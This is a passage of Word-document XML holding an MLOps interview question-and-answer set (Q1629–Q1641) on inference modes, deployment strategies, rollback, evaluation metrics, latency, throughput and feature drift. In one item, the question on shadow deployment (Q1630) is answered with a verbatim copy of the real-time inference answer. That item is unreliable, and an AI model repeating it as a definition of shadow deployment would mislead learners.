      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Batch inference is the process of running machine learning predictions on a large set of data at scheduled intervals instead of generating predictions in real time.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In batch inference, data is collected over a period of time and processed together as a batch using a trained model.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It is commonly used when:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Real-time predictions are not required</w:t>
        <w:br/>
        <w:t>* Large volumes of data need processing</w:t>
        <w:br/>
        <w:t>* Cost optimization is important</w:t>
        <w:br/>
        <w:t>* Predictions can be generated periodically</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Examples:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Daily sales forecasting</w:t>
        <w:br/>
        <w:t>* Monthly fraud analysis</w:t>
        <w:br/>
        <w:t>* Customer churn prediction</w:t>
        <w:br/>
        <w:t>* Recommendation generation overnight</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Batch inference workflows are usually executed using:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Scheduled pipelines</w:t>
        <w:br/>
        <w:t>* Apache Airflow</w:t>
        <w:br/>
        <w:t>* Spark jobs</w:t>
        <w:br/>
        <w:t>* Kubernetes CronJobs</w:t>
        <w:br/>
        <w:t>* Cloud batch processing services</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Advantages:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Cost-effective</w:t>
        <w:br/>
        <w:t>* Easier to scale for large datasets</w:t>
        <w:br/>
        <w:t>* Simpler infrastructure compared to real-time serving</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Limitation:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Predictions are not instant because processing happens periodically.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, batch inference pipelines are typically automated, monitored, and integrated with data processing and storage systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1629. What is real-time inference?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Real-time inference is the process of generating predictions instantly when new input data is received by a machine learning model.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In this approach, the model serves predictions with very low latency, usually within milliseconds or seconds, through APIs or online serving systems.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-time inference is commonly used in applications where immediate responses are required, such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Fraud detection</w:t>
        <w:br/>
        <w:t>* Recommendation systems</w:t>
        <w:br/>
        <w:t>* Chatbots</w:t>
        <w:br/>
        <w:t>* Autonomous systems</w:t>
        <w:br/>
        <w:t>* Credit card transaction validation</w:t>
        <w:br/>
        <w:t>* Personalized advertising</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When a user opens an e-commerce application, the recommendation model instantly predicts and shows personalized products based on current user activity.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-time inference systems are typically built using:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* REST/gRPC APIs</w:t>
        <w:br/>
        <w:t>* Kubernetes</w:t>
        <w:br/>
        <w:t>* Model serving platforms</w:t>
        <w:br/>
        <w:t>* Low-latency databases and caching systems</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common tools include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* TensorFlow Serving￼</w:t>
        <w:br/>
        <w:t>* KServe￼</w:t>
        <w:br/>
        <w:t>* Seldon Core￼</w:t>
        <w:br/>
        <w:t>* NVIDIA Triton Inference Server￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, real-time inference requires high availability, low latency, autoscaling, monitoring, and continuous performance tracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1630. Explain shadow deployment in ML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Real-time inference is the process of generating predictions instantly when new input data is received by a machine learning model.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In this approach, the model serves predictions with very low latency, usually within milliseconds or seconds, through APIs or online serving systems.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-time inference is commonly used in applications where immediate responses are required, such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Fraud detection</w:t>
        <w:br/>
        <w:t>* Recommendation systems</w:t>
        <w:br/>
        <w:t>* Chatbots</w:t>
        <w:br/>
        <w:t>* Autonomous systems</w:t>
        <w:br/>
        <w:t>* Credit card transaction validation</w:t>
        <w:br/>
        <w:t>* Personalized advertising</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>When a user opens an e-commerce application, the recommendation model instantly predicts and shows personalized products based on current user activity.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Real-time inference systems are typically built using:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* REST/gRPC APIs</w:t>
        <w:br/>
        <w:t>* Kubernetes</w:t>
        <w:br/>
        <w:t>* Model serving platforms</w:t>
        <w:br/>
        <w:t>* Low-latency databases and caching systems</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common tools include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* TensorFlow Serving￼</w:t>
        <w:br/>
        <w:t>* KServe￼</w:t>
        <w:br/>
        <w:t>* Seldon Core￼</w:t>
        <w:br/>
        <w:t>* NVIDIA Triton Inference Server￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, real-time inference requires high availability, low latency, autoscaling, monitoring, and continuous performance tracking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1631. What is A/B testing for ML models?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A/B testing for ML models is a technique used to compare the performance of two different machine learning models in a real production environment by splitting user traffic between them.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Typically:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Model A is the existing or baseline model</w:t>
        <w:br/>
        <w:t>* Model B is the new or updated model</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Both models receive a portion of live traffic, and their performance is measured using business and technical metrics such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Prediction accuracy</w:t>
        <w:br/>
        <w:t>* Click-through rate</w:t>
        <w:br/>
        <w:t>* Conversion rate</w:t>
        <w:br/>
        <w:t>* Latency</w:t>
        <w:br/>
        <w:t>* Revenue impact</w:t>
        <w:br/>
        <w:t>* User engagement</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The goal is to determine whether the new model performs better than the current production model before fully rolling it out.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In a recommendation system, 90% of users may continue using the existing model, while 10% are routed to the new model for testing.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>A/B testing is important in MLOps because offline model accuracy alone does not guarantee better real-world performance.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production environments, A/B testing is usually implemented using:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Traffic splitting</w:t>
        <w:br/>
        <w:t>* Kubernetes ingress/service mesh</w:t>
        <w:br/>
        <w:t>* Canary deployments</w:t>
        <w:br/>
        <w:t>* Feature flags</w:t>
        <w:br/>
        <w:t>* Monitoring and analytics platforms</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It helps reduce deployment risk and enables data-driven model release decisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1632. What is canary deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Canary deployment is a deployment strategy where a new version of an application or ML model is released gradually to a small percentage of users before rolling it out to all users.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The goal is to reduce deployment risk by testing the new version in a real production environment with limited traffic.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In this approach:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Most traffic continues going to the stable version</w:t>
        <w:br/>
        <w:t>* A small portion of traffic is routed to the new version</w:t>
        <w:br/>
        <w:t>* Performance, errors, latency, and business metrics are monitored closely</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If the new version performs well, traffic is gradually increased. If issues are detected, the deployment can be rolled back quickly with minimal impact.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, canary deployment is commonly used for:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Testing new ML models safely</w:t>
        <w:br/>
        <w:t>* Monitoring prediction quality</w:t>
        <w:br/>
        <w:t>* Detecting drift or performance issues</w:t>
        <w:br/>
        <w:t>* Validating infrastructure changes</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Canary deployments are typically implemented using:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Kubernetes</w:t>
        <w:br/>
        <w:t>* Service mesh tools like  Istio￼</w:t>
        <w:br/>
        <w:t>* Ingress controllers</w:t>
        <w:br/>
        <w:t>* Load balancers</w:t>
        <w:br/>
        <w:t>* CI/CD pipelines</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>This strategy improves deployment reliability, reduces downtime risk, and enables safer production releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1633. What is model rollback?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model rollback is the process of reverting from a newly deployed machine learning model back to a previous stable version when issues are detected in production.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Rollback is usually performed when the new model causes problems such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Reduced prediction accuracy</w:t>
        <w:br/>
        <w:t>* Increased latency</w:t>
        <w:br/>
        <w:t>* Model drift</w:t>
        <w:br/>
        <w:t>* Business metric degradation</w:t>
        <w:br/>
        <w:t>* System failures or unexpected behavior</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, rollback is important for maintaining system reliability and minimizing production impact.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If a newly deployed fraud detection model starts generating a high number of false positives, traffic can immediately be switched back to the previous stable model version.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Model rollback is typically enabled through:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Model versioning</w:t>
        <w:br/>
        <w:t>* CI/CD pipelines</w:t>
        <w:br/>
        <w:t>* Canary or blue-green deployments</w:t>
        <w:br/>
        <w:t>* Kubernetes deployments</w:t>
        <w:br/>
        <w:t>* Model registries</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Tools like  MLflow￼,  Kubeflow￼, and cloud model registries help manage rollback workflows efficiently in production environments.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1634. How do you monitor ML model accuracy?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ML model accuracy in production is monitored by continuously comparing model predictions with actual outcomes and tracking performance metrics over time.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common monitoring metrics include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Accuracy</w:t>
        <w:br/>
        <w:t>* Precision</w:t>
        <w:br/>
        <w:t>* Recall</w:t>
        <w:br/>
        <w:t>* F1-score</w:t>
        <w:br/>
        <w:t>* ROC-AUC</w:t>
        <w:br/>
        <w:t>* RMSE or MAE for regression models</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production systems, we also monitor:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Prediction latency</w:t>
        <w:br/>
        <w:t>* Error rates</w:t>
        <w:br/>
        <w:t>* Confidence scores</w:t>
        <w:br/>
        <w:t>* Data drift</w:t>
        <w:br/>
        <w:t>* Concept drift</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The monitoring process usually involves:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>1. Collecting prediction logs and actual labels</w:t>
        <w:br/>
        <w:t>2. Calculating metrics periodically</w:t>
        <w:br/>
        <w:t>3. Comparing metrics against baseline thresholds</w:t>
        <w:br/>
        <w:t>4. Triggering alerts if performance degrades</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>We typically build dashboards and alerting systems using:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Prometheus￼</w:t>
        <w:br/>
        <w:t>* Grafana￼</w:t>
        <w:br/>
        <w:t>* Evidently AI￼</w:t>
        <w:br/>
        <w:t>* WhyLabs￼</w:t>
        <w:br/>
        <w:t>* MLflow￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If accuracy drops below acceptable thresholds, retraining pipelines or rollback mechanisms can be triggered automatically as part of the MLOps workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1635. What are model performance metrics?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model performance metrics are measurements used to evaluate how well a machine learning model performs on a given task.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The choice of metric depends on the type of ML problem.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>For Classification Models:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Accuracy → Percentage of correct predictions</w:t>
        <w:br/>
        <w:t>* Precision → How many predicted positives are actually correct</w:t>
        <w:br/>
        <w:t>* Recall → How many actual positives are correctly identified</w:t>
        <w:br/>
        <w:t>* F1-Score → Balance between precision and recall</w:t>
        <w:br/>
        <w:t>* ROC-AUC → Measures classification performance across thresholds</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>For Regression Models:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* MAE (Mean Absolute Error) → Average absolute prediction error</w:t>
        <w:br/>
        <w:t>* MSE (Mean Squared Error) → Average squared error</w:t>
        <w:br/>
        <w:t>* RMSE (Root Mean Squared Error) → Square root of MSE</w:t>
        <w:br/>
        <w:t>* R² Score → Measures how well predictions fit actual values</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production MLOps systems, we also monitor operational metrics such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Prediction latency</w:t>
        <w:br/>
        <w:t>* Throughput</w:t>
        <w:br/>
        <w:t>* Error rate</w:t>
        <w:br/>
        <w:t>* Drift metrics</w:t>
        <w:br/>
        <w:t>* Resource utilization</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>These metrics help evaluate model quality, reliability, and production performance continuously.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1636. Difference between precision and recall?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Precision and recall are classification metrics used to evaluate how well a machine learning model predicts positive cases.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Precision measures how many predicted positive cases are actually correct.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Precision = \frac{TP}{TP + FP}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>High precision means fewer false positives.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>In spam detection, high precision means emails marked as spam are actually spam.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Recall measures how many actual positive cases the model correctly identifies.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Recall = \frac{TP}{TP + FN}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>High recall means fewer false negatives.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:t>In fraud detection, high recall means most fraud cases are successfully detected.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In simple terms:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Precision focuses on prediction correctness</w:t>
        <w:br/>
        <w:t>* Recall focuses on capturing all actual positive cases</w:t>
        <w:br/>
        <w:t>There is usually a tradeoff between precision and recall depending on the business use case.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1637. What is F1 score?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: F1 Score is a performance metric used in classification problems that combines both precision and recall into a single value.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It is especially useful when the dataset is imbalanced and we need a balance between false positives and false negatives.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>F1 = 2 \times \frac{Precision \times Recall}{Precision + Recall}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The F1 score ranges from 0 to 1:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* 1 means perfect precision and recall</w:t>
        <w:br/>
        <w:t>* 0 means poor model performance</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In fraud detection or medical diagnosis, where both missing positive cases and incorrect positive predictions are important, F1 score is often preferred over accuracy.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In simple terms, F1 score provides a balanced measure of model performance when both precision and recall matter.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1638. Explain ROC-AUC.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: ROC-AUC is a classification performance metric used to measure how well a model can distinguish between positive and negative classes.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ROC stands for Receiver Operating Characteristic curve, and AUC stands for Area Under the Curve.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>The ROC curve plots:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* True Positive Rate (Recall)</w:t>
        <w:br/>
        <w:t>* False Positive Rate</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>at different classification thresholds.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>TPR = \frac{TP}{TP + FN}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>FPR = \frac{FP}{FP + TN}</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>AUC measures the overall ability of the model to separate positive and negative classes.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* AUC = 1 → Perfect classifier</w:t>
        <w:br/>
        <w:t>* AUC = 0.5 → Random prediction</w:t>
        <w:br/>
        <w:t>* Higher AUC indicates better model performance</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>ROC-AUC is especially useful for evaluating classification models with imbalanced datasets because it measures performance across all thresholds instead of a single accuracy value.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In production ML systems, ROC-AUC is commonly used for fraud detection, medical diagnosis, recommendation systems, and risk prediction models.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1639. What is model latency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model latency is the time taken by a machine learning model to receive an input request, process it, and return a prediction response.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It is usually measured in milliseconds or seconds and is a critical performance metric in real-time ML systems.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Total latency can include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Data preprocessing time</w:t>
        <w:br/>
        <w:t>* Network communication time</w:t>
        <w:br/>
        <w:t>* Model inference time</w:t>
        <w:br/>
        <w:t>* Post-processing time</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Low latency is important for applications such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Fraud detection</w:t>
        <w:br/>
        <w:t>* Recommendation systems</w:t>
        <w:br/>
        <w:t>* Chatbots</w:t>
        <w:br/>
        <w:t>* Autonomous systems</w:t>
        <w:br/>
        <w:t>* Real-time analytics</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>High latency can negatively impact user experience and business performance.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, latency is monitored continuously using observability tools and optimized through:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Model optimization</w:t>
        <w:br/>
        <w:t>* GPU acceleration</w:t>
        <w:br/>
        <w:t>* Caching</w:t>
        <w:br/>
        <w:t>* Efficient feature retrieval</w:t>
        <w:br/>
        <w:t>* Autoscaling</w:t>
        <w:br/>
        <w:t>* High-performance serving frameworks</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common monitoring tools include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Prometheus￼</w:t>
        <w:br/>
        <w:t>* Grafana￼</w:t>
        <w:br/>
        <w:t>* OpenTelemetry￼</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Maintaining low latency is essential for reliable and scalable production ML systems.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1640. What is model throughput?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Model throughput is the number of prediction requests a machine learning system can process within a specific period of time.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>It is usually measured as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Requests per second (RPS)</w:t>
        <w:br/>
        <w:t>* Transactions per second (TPS)</w:t>
        <w:br/>
        <w:t>* Inferences per second</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Throughput indicates the processing capacity and scalability of a model serving system.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>If an ML inference service can handle 5,000 prediction requests per second, its throughput is 5,000 RPS.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>High throughput is important for large-scale production systems such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Recommendation engines</w:t>
        <w:br/>
        <w:t>* Search systems</w:t>
        <w:br/>
        <w:t>* Real-time analytics</w:t>
        <w:br/>
        <w:t>* Fraud detection platforms</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Throughput depends on factors such as:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Model complexity</w:t>
        <w:br/>
        <w:t>* Hardware resources (CPU/GPU)</w:t>
        <w:br/>
        <w:t>* Batch size</w:t>
        <w:br/>
        <w:t>* Network performance</w:t>
        <w:br/>
        <w:t>* Serving infrastructure</w:t>
        <w:br/>
        <w:t>* Autoscaling configuration</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, throughput is continuously monitored along with latency to ensure the system can handle increasing traffic efficiently without performance degradation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1641. What is feature drift?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Feature drift, also called data drift, occurs when the statistical distribution of input features changes over time compared to the data used during model training.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>This means the model starts receiving production data that differs from the original training data, which can reduce prediction accuracy and overall model performance.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Example:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>A recommendation model trained on customer behavior during holiday season may perform poorly when user behavior changes after the season ends.</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Common causes of feature drift include:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Changes in user behavior</w:t>
        <w:br/>
        <w:t>* Seasonal trends</w:t>
        <w:br/>
        <w:t>* Market changes</w:t>
        <w:br/>
        <w:t>* New application features</w:t>
        <w:br/>
        <w:t>* Changes in data sources</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>In MLOps, feature drift is detected by monitoring:</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>* Feature distributions</w:t>
        <w:br/>
        <w:t>* Mean and variance</w:t>
        <w:br/>
        <w:t>* Null values</w:t>
        <w:br/>
        <w:t>* Category frequencies</w:t>
        <w:br/>
        <w:t>* Statistical drift scores like PSI or KL Divergence</w:t>
        <w:br/>
        <w:br/>
        <w:br/>
        <w:t>Tools commonly used for drift monitoring include:</w:t>
        <w:br/>
